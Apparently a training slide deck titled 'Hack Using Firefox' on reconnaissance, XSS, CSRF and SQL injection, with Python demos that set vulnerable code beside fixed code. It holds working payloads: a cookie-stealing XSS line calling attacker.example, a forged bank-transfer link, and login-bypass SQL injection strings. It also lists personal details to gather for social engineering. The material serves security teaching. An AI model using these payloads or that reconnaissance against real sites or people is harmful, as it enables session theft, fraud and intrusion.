Hack Using Firefox
Ahmad Prayitno,[email protected]
Agenda
- Reconnaissance
- Cross Site Scripting (XSS)
- Cross Site Request Forgery (CSRF)
- SQL Injection
Reconnaissance
What is Reconnaissance
Finding as much information about the target as possible before launching the first attack
Types of Reconnaissance
- Active reconnaissance
- Passive reconnaissance
Active Reconnaissance
Active reconnaissance directly engages the targeted person or company, so the target can notice and log it: visiting the target's office, interviewing the target or its staff, or probing the target's own servers (for example port scanning).
Passive Reconnaissance
Passive reconnaissance gathers information about the targeted person or company without touching its systems, using public and third-party sources:
- DNS and WHOIS records (queried through public resolvers and registries)
- Netcraft
- Web archives
- Search engines
- Social media
- Newspapers, etc.
Useful Information
- Names of administrative, technical and billing contacts (from WHOIS records), for social engineering attacks
- Telephone numbers
- Email addresses, and the format of email addresses, e.g. [email protected], which lets an attacker guess other employees' addresses
- Family (wife/husband, children, etc.)
- Places
- Birthday
Firefox Addons
- Wappalyzer
- WorldIP
- Site Information
XSS
What is XSS
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
XSS Types
- Reflected XSS: triggers off a link; interactive (the victim must follow the crafted URL). Example: victim.com/{vulnerable_here}
- Stored XSS: persistent; triggers whenever the page holding the payload is viewed. Example: comment forms
XSS Attack
An XSS attack works this way:
1. The attacker identifies a web site that has one or more XSS bugs (for example, it echoes input data back without validating or encoding it).
2. The attacker crafts a special URL whose querystring contains malicious HTML and script.
3. The attacker finds a victim and gets him to click the link.
4. The victim clicks the link and the victim's browser makes a request to the vulnerable server, passing the malicious querystring, together with the victim's cookies for that site.
5. The vulnerable server echoes the malicious input, including the script, back to the victim's browser.
6. The victim's browser executes the script in the origin of the vulnerable site, so the script can read that site's cookies and page content and pass data from the victim to the attacker, or perform other actions as the victim.
Cross-Site Scripting Attack in Action
1. The attacker sends a victim a link containing a malicious payload.
2. The victim, tricked into clicking the link, sends a request (and the payload) to the vulnerable application interface.
3. The interface (e.g. a user registration form) accepts the request (and payload) and responds with a confirmation screen. Embedded in the confirmation screen is the malicious code, formatted so that the browser interprets it like any other JavaScript on the page.
4. When the victim receives the response, the browser executes the payload, which could send cookie values (including session identifiers) and other sensitive data to the attacker.
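The sequence above, as an added worked example in Python (not code from the slides; the deck's own PHP fragments appear later under SQL injection). It models the confirmation screen of step 3 as a template that echoes the submitted name, renders two constructed payloads through a vulnerable version and an escaped version, and checks whether live script survives. The attacker host attacker.example, both payloads and the template are assumptions made for the example.

```python
import html

# Constructed sample payloads (attacker host is hypothetical, not from the deck).
# PAYLOAD_BODY targets the <p> text context and exfiltrates document.cookie;
# PAYLOAD_ATTR breaks out of a quoted attribute with an event handler instead.
PAYLOAD_BODY = (
    "<script>new Image().src='https://attacker.example/c?'"
    "+encodeURIComponent(document.cookie)</script>"
)
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'

# The confirmation screen from step 3: the submitted name is echoed twice,
# once as element text and once inside a quoted attribute.
TEMPLATE = (
    '<html><body><h1>Registration complete</h1>'
    '<p>Welcome, {name}!</p>'
    '<input type="text" name="name" value="{name}">'
    '</body></html>'
)


def render_vulnerable(name: str) -> str:
    """Echo the submitted value straight into the page (the XSS bug)."""
    return TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Escape before echoing. html.escape(quote=True) turns & < > " ' into
    entities, so the browser shows the payload as text inside the <p> and
    the payload cannot close the value="..." attribute early."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def executes_script(page: str) -> bool:
    """Crude check for this demo: does a raw <script> tag or the unescaped
    attribute breakout survive in the rendered page?"""
    lowered = page.lower()
    return "<script" in lowered or '" autofocus onfocus="' in lowered


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        for payload in (PAYLOAD_BODY, PAYLOAD_ATTR):
            print(f"{label:10s} script runs: {executes_script(render(payload))}")
```

Escaping is context dependent: html.escape covers element text and quoted attributes, which is all this template has; a value echoed inside a script block or a URL would need JavaScript string or URL encoding instead.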
Attack Vectors
- Forms that are filled out whose values are later presented back to the user
- Web message boards that allow users to post their own messages
Why Cookies?
Because a cookie is a ticket: the session cookie is what the server uses to recognise a logged-in user, so whoever presents it is treated as that user. A stolen session cookie lets the attacker ride the victim's session without knowing the password, for as long as the session stays valid. Injected script can read it through document.cookie only if the cookie was set without the HttpOnly flag.
Firefox Addons
- XSS Me
- Cookie Manager
- etc.
CSRF
What is CSRF
Cross-site request forgery, also known as one-click attack or session riding is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. CSRF exploits the trust that a site has in a user's browser.
CSRF Threat Models
- Web attacker: owns https://www.attacker.com; the victim visits it while logged in to the trusted site, and the attacker's page makes the victim's browser send requests to that site.
- Content injection: the attacker gets content onto the trusted site itself (for example through a stored XSS or HTML injection bug), and that content issues unauthorized application requests.
Example
Bank website transfer request:
http://bank.com/transfer.do?acct=budi&amount=100000
The attacker creates a link and gets the logged-in victim to click it:
<a href="http://bank.com/transfer.do?acct=hacker&amount=100000">View my Pictures!</a>
The browser attaches the victim's bank.com session cookie to the forged request automatically, so the bank cannot tell it from a transfer the victim intended. Two flaws make this work: the transfer changes state on a plain GET request, and the server checks nothing except the session cookie.
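An added Python model of the deck's bank.com/transfer.do example (not code from the slides). It simulates the endpoint twice: as described above, where the session cookie is the only check, and hardened with the standard defences (no state change on GET, a check of the browser-supplied Origin header, and a synchronizer token bound to the session with an HMAC). The session id, server secret, account balances and the attacker's requests are constructed for the example; bank.com, www.attacker.com and the acct/amount parameters are the deck's.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed state (hypothetical values, not from the deck): one logged-in
# session, a per-server secret for minting tokens, and the bank's origin.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"s3ss10n-budi": "budi"}          # cookie value -> user
SITE_ORIGIN = "http://bank.com"


def new_accounts() -> dict:
    """Fresh balances so each demo run starts from the same state."""
    return {"budi": 500000, "ani": 0, "hacker": 0}


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC. bank.com renders it
    into its own forms; a page on attacker.com has no way to read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _move(accounts: dict, src: str, dst: str, amount: int):
    if dst not in accounts or accounts.get(src, 0) < amount:
        return 400, "unknown account or insufficient funds"
    accounts[src] -= amount
    accounts[dst] += amount
    return 200, f"moved {amount} from {src} to {dst}"


def transfer_vulnerable(req: dict, accounts: dict):
    """transfer.do as in the deck: any method, and the cookie is the only
    check. The browser attaches that cookie to every request for bank.com,
    including one triggered from the attacker's page."""
    user = SESSIONS.get(req["cookie"])
    if user is None:
        return 401, "not logged in"
    q = parse_qs(urlsplit(req["url"]).query)
    return _move(accounts, user, q["acct"][0], int(q["amount"][0]))


def transfer_hardened(req: dict, accounts: dict):
    """Same endpoint with three defences: state changes only on POST, the
    browser-supplied Origin must be the bank's own, and the form must carry
    a valid token (compared in constant time)."""
    user = SESSIONS.get(req["cookie"])
    if user is None:
        return 401, "not logged in"
    if req["method"] != "POST":
        return 405, "transfers require POST"
    if req.get("origin") != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    if not hmac.compare_digest(req["form"].get("csrf", ""), csrf_token(req["cookie"])):
        return 403, "missing or invalid CSRF token"
    return _move(accounts, user, req["form"]["acct"], int(req["form"]["amount"]))


# The deck's link as the victim's browser sends it after the click: the
# bank.com cookie rides along automatically; a link click carries no Origin.
FORGED_LINK = {
    "method": "GET",
    "url": "http://bank.com/transfer.do?acct=hacker&amount=100000",
    "cookie": "s3ss10n-budi",
}

# Same attack as an auto-submitting form on attacker.com (constructed): the
# browser now sends Origin, and the attacker cannot supply a valid token.
FORGED_POST = {
    "method": "POST",
    "url": "http://bank.com/transfer.do",
    "cookie": "s3ss10n-budi",
    "origin": "https://www.attacker.com",
    "form": {"acct": "hacker", "amount": "100000"},
}


def legit_request() -> dict:
    """What bank.com's own transfer form submits, token included."""
    return {
        "method": "POST",
        "url": "http://bank.com/transfer.do",
        "cookie": "s3ss10n-budi",
        "origin": SITE_ORIGIN,
        "form": {"acct": "ani", "amount": "100000", "csrf": csrf_token("s3ss10n-budi")},
    }


if __name__ == "__main__":
    acc = new_accounts()
    print("vulnerable, forged link:", transfer_vulnerable(FORGED_LINK, acc), acc)
    acc = new_accounts()
    print("hardened, forged link:  ", transfer_hardened(FORGED_LINK, acc))
    print("hardened, forged post:  ", transfer_hardened(FORGED_POST, acc))
    print("hardened, legit post:   ", transfer_hardened(legit_request(), acc), acc)
```

The token check is the defence that does not depend on the browser: Origin is absent on some requests and, in the hardened handler, a missing header is rejected rather than waived. The SameSite cookie attribute is a further browser-side mitigation that keeps the cookie off cross-site requests altogether.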
SQL Injection
What is SQL Injection
SQL injection is a vulnerability in a web application that lets an attacker inject SQL commands into the queries the application sends to its database, through an input form or any other untrusted input that is pasted into the SQL text.
How common is it?
- It is one of the most common website vulnerabilities.
- It is a flaw in web application development, not a database or web server problem.
- Most programmers are still not aware of this problem.
- A lot of PHP tutorials and PHP demos are vulnerable.
- Even worse, a lot of the solutions posted on the Internet are not good enough (for example blacklisting a few characters instead of using parameterised queries).
Vulnerable Applications
Almost all SQL databases and programming languages are potentially vulnerable:
- Databases: MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc.
- Languages: PHP, ASP, etc.
How does SQL Injection work?
Common vulnerable login query, built by pasting the submitted values into the SQL text:
SELECT * FROM users WHERE username = 'ahmad' AND password = 'rahasia'
Injecting through Strings
$username = ' or '1'='1' -- 
$password = anything
The final query would look like this:
SELECT * FROM users WHERE username = '' or '1'='1' -- ' AND password = 'anything'
The first quote closes the username literal, or '1'='1' makes the WHERE clause true for every row, and -- comments out the rest of the query, so the password is never checked. (In MySQL the -- must be followed by a space; # also starts a comment there.)
If it were numeric?
SELECT * FROM clients WHERE account = 12345678 AND pin = 1111
PHP/MySQL login syntax:
$sql = "SELECT * FROM clients WHERE " .
       "account = $formacct AND " .
       "pin = $formpin";
Injecting Numeric Fields
$formacct = 1 or 1=1 -- 
$formpin = 1111
The final query would look like this:
SELECT * FROM clients WHERE account = 1 or 1=1 -- AND pin = 1111
No quote is needed here: the value is interpolated unquoted, so the injected text is already part of the SQL grammar. (# works in place of -- on MySQL.)
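Both injections above, carried through against a real database as an added example (Python with the standard sqlite3 module standing in for the deck's PHP/MySQL; not code from the slides). Each vulnerable query is built by string interpolation exactly as the deck describes and is shown beside its parameterised form, with a type check added for the numeric field. The users and clients tables and their rows are constructed from the deck's examples; SQLite uses -- for comments, so the MySQL-only # is not used here.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with the deck's two example tables.
    Passwords are stored in clear only to mirror the slides."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users   (username TEXT, password TEXT);
        CREATE TABLE clients (account INTEGER, pin INTEGER);
        INSERT INTO users   VALUES ('ahmad', 'rahasia'), ('budi', 's3cret');
        INSERT INTO clients VALUES (12345678, 1111), (87654321, 2222);
        """
    )
    return con


def login_vulnerable(con, username: str, password: str):
    """The deck's PHP pattern: untrusted input is pasted into the SQL text,
    so the input can change the structure of the query."""
    sql = (f"SELECT * FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_safe(con, username: str, password: str):
    """Parameterised query: the values travel separately from the SQL text,
    so a quote or comment marker in the input is only data."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


def pin_check_vulnerable(con, formacct: str, formpin: str):
    """Numeric fields need no quote to break out: the unquoted value is
    already part of the SQL grammar."""
    sql = f"SELECT * FROM clients WHERE account = {formacct} AND pin = {formpin}"
    return con.execute(sql).fetchall()


def pin_check_safe(con, formacct: str, formpin: str):
    """Convert to int first (rejects '1 or 1=1') and still bind as parameters."""
    try:
        acct, pin = int(formacct), int(formpin)
    except ValueError:
        return []
    sql = "SELECT * FROM clients WHERE account = ? AND pin = ?"
    return con.execute(sql, (acct, pin)).fetchall()


def demo() -> dict:
    """Run the deck's two payloads through the vulnerable and safe versions."""
    con = make_db()
    return {
        "string_vuln": login_vulnerable(con, "' or '1'='1' -- ", "anything"),
        "string_safe": login_safe(con, "' or '1'='1' -- ", "anything"),
        "numeric_vuln": pin_check_vulnerable(con, "1 or 1=1 -- ", "1111"),
        "numeric_safe": pin_check_safe(con, "1 or 1=1 -- ", "1111"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s} -> {len(rows)} row(s): {rows}")
```

The vulnerable string login returns every user for a password it never checked, while the same payload against the parameterised query matches nothing. Parameter binding is the fix; the int() conversion on the numeric path is defence in depth, not a substitute for it.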
Firefox Addon
- Hack Bar